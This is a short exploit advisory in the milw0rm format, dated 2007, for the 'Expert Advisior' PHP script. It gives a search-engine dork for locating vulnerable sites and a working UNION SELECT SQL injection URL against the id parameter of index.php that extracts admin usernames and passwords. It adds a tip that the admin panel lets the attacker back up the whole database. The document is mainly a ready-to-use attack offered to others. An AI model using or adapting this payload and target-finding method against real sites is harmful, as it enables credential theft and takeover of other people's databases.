1 −−==+================================================================================+==−−
2 −−==+ Expert Advisior SQL Injection Vulnerbility +==−−
3 −−==+================================================================================+==−−
4
5
6 AUTHOR: t0pP8uZz & xprog
7 SITE: N/A
8 DORK: intitle:"Answer Builder" Ask a question
9
10
11 DESCRIPTION:
12 pull out admin user/pass from the database
13
14
15 EXPLOITS:
16 http://server.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e
,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*
17
18
19 NOTE/TIP:
20 admin login is at /admin/ you can backup DB there.
21
22
23 GREETZ: milw0rm.com, H4CKY0u.org, G0t−Root.net/G0t−Root.org !
24
25
26 −−==+================================================================================+==−−
27 −−==+ Expert Advisior SQL Injection Vulnerbility +==−−
28 −−==+================================================================================+==−−
29
30 # milw0rm.com [2007−07−17]
Page 1/1
Expert Advisior index.php id Remote SQL Injection Vulnerbility
t0pP8uZz
07/17/2007